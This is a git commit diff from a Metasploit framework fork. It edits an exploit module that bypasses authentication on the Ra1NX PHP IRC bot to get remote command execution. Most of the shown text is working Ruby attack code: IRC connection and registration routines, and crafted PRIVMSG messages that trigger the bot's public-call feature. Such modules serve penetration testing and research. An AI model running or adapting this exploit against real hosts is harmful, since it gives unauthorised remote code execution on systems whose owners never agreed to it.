Merge branch 'Ra1NX_pubcall' of https://github.com/bwall/metasploit-framework into Ra1NX_pubcall

unstable
bwall 2013-03-29 13:29:38 -04:00
commit 21ea1c9ed4
1 changed files with 34 additions and 18 deletions

View File

@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => '"Ra1NX" PHP Bot PubCall Authentication Bypass Remote Code Execution', 'Name' => 'Ra1NX PHP Bot PubCall Authentication Bypass Remote Code Execution',
'Description' => %q{ 'Description' => %q{
This module allows remote command execution on the PHP IRC bot Ra1NX by This module allows remote command execution on the PHP IRC bot Ra1NX by
using the public call feature in private message to covertly bypass the using the public call feature in private message to covertly bypass the
@ -27,6 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'References' => 'References' =>
[ [
['OSVDB', '91663'],
['URL', 'https://defense.ballastsecurity.net/wiki/index.php/Ra1NX_bot'], ['URL', 'https://defense.ballastsecurity.net/wiki/index.php/Ra1NX_bot'],
['URL', 'https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0'], ['URL', 'https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0'],
['URL', 'http://ddecode.com/phpdecoder/?results=8c6ba611ea2a504da928c6e176a6537b'] ['URL', 'http://ddecode.com/phpdecoder/?results=8c6ba611ea2a504da928c6e176a6537b']
@ -40,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
'DisableNops' => true, 'DisableNops' => true,
'Compat' => 'Compat' =>
{ {
'PayloadType' => 'cmd', 'PayloadType' => 'cmd'
} }
}, },
'Targets' => 'Targets' =>
@ -62,16 +63,38 @@ class Metasploit3 < Msf::Exploit::Remote
], self.class) ], self.class)
end end
def check def connect_irc
print_status("#{rhost}:#{rport} - Connecting to IRC server...")
connect connect
data = ""
begin
read_data = sock.get_once(-1, 1)
while not read_data.nil?
data << read_data
read_data = sock.get_once(-1, 1)
end
rescue EOFError
end
if data and data =~ /020.*wait/
print_status("#{rhost}:#{rport} - Connection successful, giving 3 seconds to IRC server to process our connection...")
select(nil, nil, nil, 3)
end
end
def check
connect_irc
response = register(sock) response = register(sock)
if response =~ /463/ or response =~ /464/ if response =~ /463/ or response =~ /464/
print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed") print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
return Exploit::CheckCode::Unknown return Exploit::CheckCode::Unknown
end end
confirm_string = rand_text_alpha(8) confirm_string = rand_text_alpha(8)
response = send_msg(sock, "PRIVMSG #{datastore['RNICK']} :#{datastore['RNICK']} @msg #{datastore['NICK']} #{confirm_string}\r\n", ":#{datastore['RNICK']}") response = send_msg(sock, "PRIVMSG #{datastore['RNICK']} :#{datastore['RNICK']} @msg #{datastore['NICK']} #{confirm_string}\r\n")
quit(sock) quit(sock)
disconnect disconnect
@ -82,22 +105,15 @@ class Metasploit3 < Msf::Exploit::Remote
end end
end end
def send_msg(sock, data, startResponse = nil) def send_msg(sock, data)
sock.put(data) sock.put(data)
data = "" data = ""
count = 3
begin
begin begin
read_data = sock.get_once(-1, 1) read_data = sock.get_once(-1, 1)
while not read_data.nil? while not read_data.nil?
data << read_data data << read_data
read_data = sock.get_once(-1, 1) read_data = sock.get_once(-1, 1)
end end
if startResponse != nil and data.start_with?(startResponse)
startResponse = nil
end
count -= 1
end while startResponse == nil and count != 0
rescue EOFError rescue EOFError
end end
data data
@ -137,7 +153,7 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def exploit def exploit
connect connect_irc
print_status("#{rhost}:#{rport} - Registering with the IRC Server...") print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
response = register(sock) response = register(sock)